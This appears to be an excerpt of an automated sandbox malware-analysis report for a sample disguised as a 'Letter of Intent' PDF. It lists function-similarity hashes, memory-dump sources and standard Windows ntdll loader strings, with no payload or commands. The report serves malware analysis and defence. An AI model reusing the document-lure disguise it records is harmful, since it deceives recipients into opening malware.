                                                                                      • Opcode ID: 6579dbeebc6caa7cf3c89fa27f0d6f2c97c653e437bf1eae81b73267cb599c90
                                                                                      • Instruction ID: 1b14f9d77f51f6697d11ee898a923628a6f4e92db11473d5f69bcd9bbdabafcd
                                                                                      • Opcode Fuzzy Hash: 6579dbeebc6caa7cf3c89fa27f0d6f2c97c653e437bf1eae81b73267cb599c90
                                                                                      • Instruction Fuzzy Hash: 1290027120140413D14171589504746000547D0701F55C412A6074515E86598ED966A6
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2383505236.0000000032F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 32F60000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2383505236.0000000033089000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2383505236.000000003308D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2383505236.00000000330FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_32f60000_Letter of Intent (LOI) For the Company November 2024 PDF.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: d780b0f7ac6fa7a5a67b88b32e85266bf2236bd7162850f092052c5b9b78e6ec
                                                                                      • Instruction ID: d3f6a33607694c44dd96e98ecee489cd354d738e61360747faaff2d9b65c1156
                                                                                      • Opcode Fuzzy Hash: d780b0f7ac6fa7a5a67b88b32e85266bf2236bd7162850f092052c5b9b78e6ec
                                                                                      • Instruction Fuzzy Hash: 1B90022160140513D10271589504616000A47D0641F95C423A2034516ECA258A96A172
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2383505236.0000000032F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 32F60000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2383505236.0000000033089000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2383505236.000000003308D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2383505236.00000000330FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_32f60000_Letter of Intent (LOI) For the Company November 2024 PDF.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 9fca51798cd6768312c4ecca5c890cd2b3f1f991f6df2ee17402f0670d26da6c
                                                                                      • Instruction ID: 1d5559b98bdcadb1ed7c74714e7251b459604a9dd9c390eb9a2d6f87c4f7ffdd
                                                                                      • Opcode Fuzzy Hash: 9fca51798cd6768312c4ecca5c890cd2b3f1f991f6df2ee17402f0670d26da6c
                                                                                      • Instruction Fuzzy Hash: AB90022130140413D10371589514606000987D1745F95C413E2434516D86258A57A173
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2383505236.0000000032F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 32F60000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2383505236.0000000033089000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2383505236.000000003308D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2383505236.00000000330FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_32f60000_Letter of Intent (LOI) For the Company November 2024 PDF.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 2d474a770d5ef22cc3032fe46b1198faba8784cdf9b0cc395176307a26f4114a
                                                                                      • Instruction ID: 974d7a5c744f9123d6c69d6b153f78503f62d67bc2f8eaab69a98992ba9d33a6
                                                                                      • Opcode Fuzzy Hash: 2d474a770d5ef22cc3032fe46b1198faba8784cdf9b0cc395176307a26f4114a
                                                                                      • Instruction Fuzzy Hash: 37900221211C0053D20175689D14B07000547D0703F55C516A1164515CC91589655562
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2383505236.0000000032F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 32F60000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2383505236.0000000033089000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2383505236.000000003308D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2383505236.00000000330FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_32f60000_Letter of Intent (LOI) For the Company November 2024 PDF.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: ff1b47ebbd2ce4d0d4543ccab55817afe221c00fae978f158c5bf5f951a50515
                                                                                      • Instruction ID: c5fbdf1527af59b3a5c95d79df2ecf93af24749a15e37a10f77c40128c76341e
                                                                                      • Opcode Fuzzy Hash: ff1b47ebbd2ce4d0d4543ccab55817afe221c00fae978f158c5bf5f951a50515
                                                                                      • Instruction Fuzzy Hash: E39002216014005341417168D94490640056BE1611755C522A19A8511D8559896956A6
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2383505236.0000000032F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 32F60000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2383505236.0000000033089000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2383505236.000000003308D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2383505236.00000000330FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_32f60000_Letter of Intent (LOI) For the Company November 2024 PDF.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: f402abbd786edc504d6800e22883e58b1370c9be044632ac0b4774ae33606a16
                                                                                      • Instruction ID: f81da214c43a8c7f71c2402b4bc9f275d25af6e858042878a82402de42dfb60e
                                                                                      • Opcode Fuzzy Hash: f402abbd786edc504d6800e22883e58b1370c9be044632ac0b4774ae33606a16
                                                                                      • Instruction Fuzzy Hash: 8B90023120180413D10171589908747000547D0702F55C412A6174516E8665C9956572
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2383505236.0000000032F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 32F60000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2383505236.0000000033089000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2383505236.000000003308D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2383505236.00000000330FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_32f60000_Letter of Intent (LOI) For the Company November 2024 PDF.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 60594155e7be4eab5e053795c51fdd8bc74de689a68e16fdd6538ace7c9bdc99
                                                                                      • Instruction ID: 73c5ab6b5d796fc9f06108052368b9a943e12fe062a180cd2cd535fb5f1cccbc
                                                                                      • Opcode Fuzzy Hash: 60594155e7be4eab5e053795c51fdd8bc74de689a68e16fdd6538ace7c9bdc99
                                                                                      • Instruction Fuzzy Hash: 7290023120180413D1017158991470B000547D0702F55C412A2174516D8625895565B2
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2383505236.0000000032F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 32F60000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2383505236.0000000033089000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2383505236.000000003308D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2383505236.00000000330FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_32f60000_Letter of Intent (LOI) For the Company November 2024 PDF.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 8a33432ca8aaab4ae9b815e90b25d91d1f0ff8c5a95b32486d5fcb41fa425d5d
                                                                                      • Instruction ID: 044ff05b7d25e0e7d59e608b6653aaae863cb2fb213d9de11216a05467989157
                                                                                      • Opcode Fuzzy Hash: 8a33432ca8aaab4ae9b815e90b25d91d1f0ff8c5a95b32486d5fcb41fa425d5d
                                                                                      • Instruction Fuzzy Hash: AE90047131140053D105715CD504707004547F1701F55C413F3174515CC53DCD755177
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2383505236.0000000032F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 32F60000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2383505236.0000000033089000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2383505236.000000003308D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2383505236.00000000330FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_32f60000_Letter of Intent (LOI) For the Company November 2024 PDF.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 87f1649603dbd2fbb05864b22ae623cc0c5356d6f8231eadf96aeabd348a4f37
                                                                                      • Instruction ID: 393b28ca1fed3b90a7ed8fc16909533969af2da8b8e487614bd482a10cbb6172
                                                                                      • Opcode Fuzzy Hash: 87f1649603dbd2fbb05864b22ae623cc0c5356d6f8231eadf96aeabd348a4f37
                                                                                      • Instruction Fuzzy Hash: 2590026134140453D10171589514B06000587E1701F55C416E2074515D8619CD566167
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2383505236.0000000032F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 32F60000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2383505236.0000000033089000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2383505236.000000003308D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2383505236.00000000330FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_32f60000_Letter of Intent (LOI) For the Company November 2024 PDF.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: a5a3ee001bb83284ff0dfa89982a97bbe7462bb928aa9bc7c2e61187e9bacedf
                                                                                      • Instruction ID: 4762e6c774a52767274747d339650b46a14fdaf7c02dc8d8ea034c787e7b2747
                                                                                      • Opcode Fuzzy Hash: a5a3ee001bb83284ff0dfa89982a97bbe7462bb928aa9bc7c2e61187e9bacedf
                                                                                      • Instruction Fuzzy Hash: 1590023120140413D1017158A608707000547D0601F55D812A1434519DD65689556162
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2383505236.0000000032F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 32F60000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2383505236.0000000033089000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2383505236.000000003308D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2383505236.00000000330FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_32f60000_Letter of Intent (LOI) For the Company November 2024 PDF.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 3cd3ec8182cc208ca56f953d415492ab06059db1aa050c80573479ebbbdcc905
                                                                                      • Instruction ID: 345926e84944b245db68ea6ebbbe82ce763d7faca81b926ea322e83842355cff
                                                                                      • Opcode Fuzzy Hash: 3cd3ec8182cc208ca56f953d415492ab06059db1aa050c80573479ebbbdcc905
                                                                                      • Instruction Fuzzy Hash: B290022160540413D1417158A518706001547D0601F55D412A1034515DC6598B5966E2
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2383505236.0000000032F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 32F60000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2383505236.0000000033089000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2383505236.000000003308D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2383505236.00000000330FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_32f60000_Letter of Intent (LOI) For the Company November 2024 PDF.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 620d48bfca2f6c991fbff7fb35dc707c90b0dd0e7ec141056745fbf7e6ccdf79
                                                                                      • Instruction ID: 010ddfa05099718b2cf9c250654ce512a44334d98c96af7c5b1acdfc616bc29a
                                                                                      • Opcode Fuzzy Hash: 620d48bfca2f6c991fbff7fb35dc707c90b0dd0e7ec141056745fbf7e6ccdf79
                                                                                      • Instruction Fuzzy Hash: B690023120140413D1017598A508646000547E0701F55D412A6034516EC66589956172
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2383505236.0000000032F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 32F60000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2383505236.0000000033089000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2383505236.000000003308D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2383505236.00000000330FE000.00000040.00001000.00020000.00000000.sdmpDownload File

                                                                                      Similarity
                                                                                      • API ID: ___swprintf_l
                                                                                      • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                                      • API String ID: 48624451-2108815105

                                                                                      Similarity
                                                                                      • API ID: ___swprintf_l
                                                                                      • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                                      • API String ID: 48624451-2108815105

                                                                                      Similarity
                                                                                      • API ID: DebugPrintTimes
                                                                                      • String ID: HEAP:
                                                                                      • API String ID: 3446177414-2466845122

                                                                                      Strings
                                                                                      • Execute=1, xrefs: 33004713
                                                                                      • ExecuteOptions, xrefs: 330046A0
                                                                                      • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 33004725
                                                                                      • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 330046FC
                                                                                      • CLIENT(ntdll): Processing section info %ws..., xrefs: 33004787
                                                                                      • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 33004742
                                                                                      • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 33004655
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2383505236.0000000032F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 32F60000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2383505236.0000000033089000.00000040.00001000.00020000.00000000.sdmp
                                                                                      • Associated: 00000002.00000002.2383505236.000000003308D000.00000040.00001000.00020000.00000000.sdmp
                                                                                      • Associated: 00000002.00000002.2383505236.00000000330FE000.00000040.00001000.00020000.00000000.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_32f60000_Letter of Intent (LOI) For the Company November 2024 PDF.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                                                      • API String ID: 0-484625025
                                                                                      Strings
                                                                                      • RtlpFindActivationContextSection_CheckParameters, xrefs: 32FF79D0, 32FF79F5
                                                                                      • Actx , xrefs: 32FF7A0C, 32FF7A73
                                                                                      • RtlFindActivationContextSectionString() found section at %p (length %lu) which is not a string section, xrefs: 32FF7AE6
                                                                                      • SXS: %s() flags contains return_flags but they don't fit in size, return invalid_parameter 0x%08lx., xrefs: 32FF79D5
                                                                                      • SXS: %s() flags contains return_assembly_metadata but they don't fit in size, return invalid_parameter 0x%08lx., xrefs: 32FF79FA
                                                                                      • SsHd, xrefs: 32FAA3E4
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2383505236.0000000032F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 32F60000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2383505236.0000000033089000.00000040.00001000.00020000.00000000.sdmp
                                                                                      • Associated: 00000002.00000002.2383505236.000000003308D000.00000040.00001000.00020000.00000000.sdmp
                                                                                      • Associated: 00000002.00000002.2383505236.00000000330FE000.00000040.00001000.00020000.00000000.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_32f60000_Letter of Intent (LOI) For the Company November 2024 PDF.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: Actx $RtlFindActivationContextSectionString() found section at %p (length %lu) which is not a string section$RtlpFindActivationContextSection_CheckParameters$SXS: %s() flags contains return_assembly_metadata but they don't fit in size, return invalid_parameter 0x%08lx.$SXS: %s() flags contains return_flags but they don't fit in size, return invalid_parameter 0x%08lx.$SsHd
                                                                                      • API String ID: 0-1988757188
                                                                                      APIs
                                                                                      Strings
                                                                                      • RtlpFindActivationContextSection_CheckParameters, xrefs: 32FF9341, 32FF9366
                                                                                      • Actx , xrefs: 32FF9508
                                                                                      • GsHd, xrefs: 32FAD874
                                                                                      • SXS: %s() flags contains return_flags but they don't fit in size, return invalid_parameter 0x%08lx., xrefs: 32FF9346
                                                                                      • RtlFindActivationContextSectionGuid() found section at %p (length %lu) which is not a GUID section, xrefs: 32FF9565
                                                                                      • SXS: %s() flags contains return_assembly_metadata but they don't fit in size, return invalid_parameter 0x%08lx., xrefs: 32FF936B
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2383505236.0000000032F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 32F60000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2383505236.0000000033089000.00000040.00001000.00020000.00000000.sdmp
                                                                                      • Associated: 00000002.00000002.2383505236.000000003308D000.00000040.00001000.00020000.00000000.sdmp
                                                                                      • Associated: 00000002.00000002.2383505236.00000000330FE000.00000040.00001000.00020000.00000000.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_32f60000_Letter of Intent (LOI) For the Company November 2024 PDF.jbxd
                                                                                      Similarity
                                                                                      • API ID: DebugPrintTimes
                                                                                      • String ID: Actx $GsHd$RtlFindActivationContextSectionGuid() found section at %p (length %lu) which is not a GUID section$RtlpFindActivationContextSection_CheckParameters$SXS: %s() flags contains return_assembly_metadata but they don't fit in size, return invalid_parameter 0x%08lx.$SXS: %s() flags contains return_flags but they don't fit in size, return invalid_parameter 0x%08lx.
                                                                                      • API String ID: 3446177414-2196497285
                                                                                      APIs
                                                                                      • RtlDebugPrintTimes.NTDLL ref: 32F8656C
                                                                                        • Part of subcall function 32F865B5: RtlDebugPrintTimes.NTDLL ref: 32F86664
                                                                                        • Part of subcall function 32F865B5: RtlDebugPrintTimes.NTDLL ref: 32F866AF
                                                                                      Strings
                                                                                      • Getting the shim engine exports failed with status 0x%08lx, xrefs: 32FE9A01
                                                                                      • LdrpInitShimEngine, xrefs: 32FE99F4, 32FE9A07, 32FE9A30
                                                                                      • minkernel\ntdll\ldrinit.c, xrefs: 32FE9A11, 32FE9A3A
                                                                                      • apphelp.dll, xrefs: 32F86496
                                                                                      • Loading the shim engine DLL failed with status 0x%08lx, xrefs: 32FE9A2A
                                                                                      • Building shim engine DLL system32 filename failed with status 0x%08lx, xrefs: 32FE99ED
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2383505236.0000000032F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 32F60000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2383505236.0000000033089000.00000040.00001000.00020000.00000000.sdmp
                                                                                      • Associated: 00000002.00000002.2383505236.000000003308D000.00000040.00001000.00020000.00000000.sdmp
                                                                                      • Associated: 00000002.00000002.2383505236.00000000330FE000.00000040.00001000.00020000.00000000.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_32f60000_Letter of Intent (LOI) For the Company November 2024 PDF.jbxd
                                                                                      Similarity
                                                                                      • API ID: DebugPrintTimes
                                                                                      • String ID: Building shim engine DLL system32 filename failed with status 0x%08lx$Getting the shim engine exports failed with status 0x%08lx$LdrpInitShimEngine$Loading the shim engine DLL failed with status 0x%08lx$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                                                      • API String ID: 3446177414-204845295
                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2383505236.0000000032F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 32F60000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2383505236.0000000033089000.00000040.00001000.00020000.00000000.sdmp
                                                                                      • Associated: 00000002.00000002.2383505236.000000003308D000.00000040.00001000.00020000.00000000.sdmp
                                                                                      • Associated: 00000002.00000002.2383505236.00000000330FE000.00000040.00001000.00020000.00000000.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_32f60000_Letter of Intent (LOI) For the Company November 2024 PDF.jbxd
                                                                                      Similarity
                                                                                      • API ID: DebugPrintTimes
                                                                                      • String ID: $$Failed to find export %s!%s (Ordinal:%d) in "%wZ" 0x%08lx$LdrpRedirectDelayloadFailure$Unknown$minkernel\ntdll\ldrdload.c
                                                                                      • API String ID: 3446177414-4227709934
                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2383505236.0000000032F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 32F60000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2383505236.0000000033089000.00000040.00001000.00020000.00000000.sdmp
                                                                                      • Associated: 00000002.00000002.2383505236.000000003308D000.00000040.00001000.00020000.00000000.sdmp
                                                                                      • Associated: 00000002.00000002.2383505236.00000000330FE000.00000040.00001000.00020000.00000000.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_32f60000_Letter of Intent (LOI) For the Company November 2024 PDF.jbxd
                                                                                      Similarity
                                                                                      • API ID: DebugPrintTimes
                                                                                      • String ID: About to free block at %p$About to free block at %p with tag %ws$HEAP: $HEAP[%wZ]: $RtlFreeHeap
                                                                                      • API String ID: 3446177414-3492000579
                                                                                      APIs
                                                                                      Strings
                                                                                      • Initializing the shim DLL "%wZ" failed with status 0x%08lx, xrefs: 32FE9AF6
                                                                                      • minkernel\ntdll\ldrinit.c, xrefs: 32FE9AC5, 32FE9B06
                                                                                      • LdrpLoadShimEngine, xrefs: 32FE9ABB, 32FE9AFC
                                                                                      • Loading the shim DLL "%wZ" failed with status 0x%08lx, xrefs: 32FE9AB4
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2383505236.0000000032F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 32F60000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2383505236.0000000033089000.00000040.00001000.00020000.00000000.sdmp
                                                                                      • Associated: 00000002.00000002.2383505236.000000003308D000.00000040.00001000.00020000.00000000.sdmp
                                                                                      • Associated: 00000002.00000002.2383505236.00000000330FE000.00000040.00001000.00020000.00000000.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_32f60000_Letter of Intent (LOI) For the Company November 2024 PDF.jbxd
                                                                                      Similarity
                                                                                      • API ID: DebugPrintTimes
                                                                                      • String ID: Initializing the shim DLL "%wZ" failed with status 0x%08lx$LdrpLoadShimEngine$Loading the shim DLL "%wZ" failed with status 0x%08lx$minkernel\ntdll\ldrinit.c
                                                                                      • API String ID: 3446177414-3589223738
                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2383505236.0000000032F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 32F60000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2383505236.0000000033089000.00000040.00001000.00020000.00000000.sdmp
                                                                                      • Associated: 00000002.00000002.2383505236.000000003308D000.00000040.00001000.00020000.00000000.sdmp
                                                                                      • Associated: 00000002.00000002.2383505236.00000000330FE000.00000040.00001000.00020000.00000000.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_32f60000_Letter of Intent (LOI) For the Company November 2024 PDF.jbxd
                                                                                      Similarity
                                                                                      • API ID: __aulldvrm
                                                                                      • String ID: +$-$0$0
                                                                                      • API String ID: 1302938615-699404926
                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2383505236.0000000032F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 32F60000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2383505236.0000000033089000.00000040.00001000.00020000.00000000.sdmp
                                                                                      • Associated: 00000002.00000002.2383505236.000000003308D000.00000040.00001000.00020000.00000000.sdmp
                                                                                      • Associated: 00000002.00000002.2383505236.00000000330FE000.00000040.00001000.00020000.00000000.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_32f60000_Letter of Intent (LOI) For the Company November 2024 PDF.jbxd
                                                                                      Similarity
                                                                                      • API ID: DebugPrintTimes
                                                                                      • String ID: $$@
                                                                                      • API String ID: 3446177414-1194432280
                                                                                      APIs
                                                                                      Strings
                                                                                      • Querying the active activation context failed with status 0x%08lx, xrefs: 3300365C
                                                                                      • LdrpFindDllActivationContext, xrefs: 33003636, 33003662
                                                                                      • minkernel\ntdll\ldrsnap.c, xrefs: 33003640, 3300366C
                                                                                      • Probing for the manifest of DLL "%wZ" failed with status 0x%08lx, xrefs: 3300362F
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2383505236.0000000032F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 32F60000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2383505236.0000000033089000.00000040.00001000.00020000.00000000.sdmp
                                                                                      • Associated: 00000002.00000002.2383505236.000000003308D000.00000040.00001000.00020000.00000000.sdmp
                                                                                      • Associated: 00000002.00000002.2383505236.00000000330FE000.00000040.00001000.00020000.00000000.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_32f60000_Letter of Intent (LOI) For the Company November 2024 PDF.jbxd
                                                                                      Similarity
                                                                                      • API ID: DebugPrintTimes
                                                                                      • String ID: LdrpFindDllActivationContext$Probing for the manifest of DLL "%wZ" failed with status 0x%08lx$Querying the active activation context failed with status 0x%08lx$minkernel\ntdll\ldrsnap.c
                                                                                      • API String ID: 3446177414-3779518884
                                                                                      Strings
                                                                                      • Getting ApphelpCheckModule failed with status 0x%08lx, xrefs: 32FFA992
                                                                                      • LdrpDynamicShimModule, xrefs: 32FFA998
                                                                                      • minkernel\ntdll\ldrinit.c, xrefs: 32FFA9A2
                                                                                      • apphelp.dll, xrefs: 32FB2462
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2383505236.0000000032F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 32F60000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2383505236.0000000033089000.00000040.00001000.00020000.00000000.sdmp
                                                                                      • Associated: 00000002.00000002.2383505236.000000003308D000.00000040.00001000.00020000.00000000.sdmp
                                                                                      • Associated: 00000002.00000002.2383505236.00000000330FE000.00000040.00001000.00020000.00000000.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_32f60000_Letter of Intent (LOI) For the Company November 2024 PDF.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: Getting ApphelpCheckModule failed with status 0x%08lx$LdrpDynamicShimModule$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                                                      • API String ID: 0-176724104
                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2383505236.0000000032F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 32F60000, based on PE: true
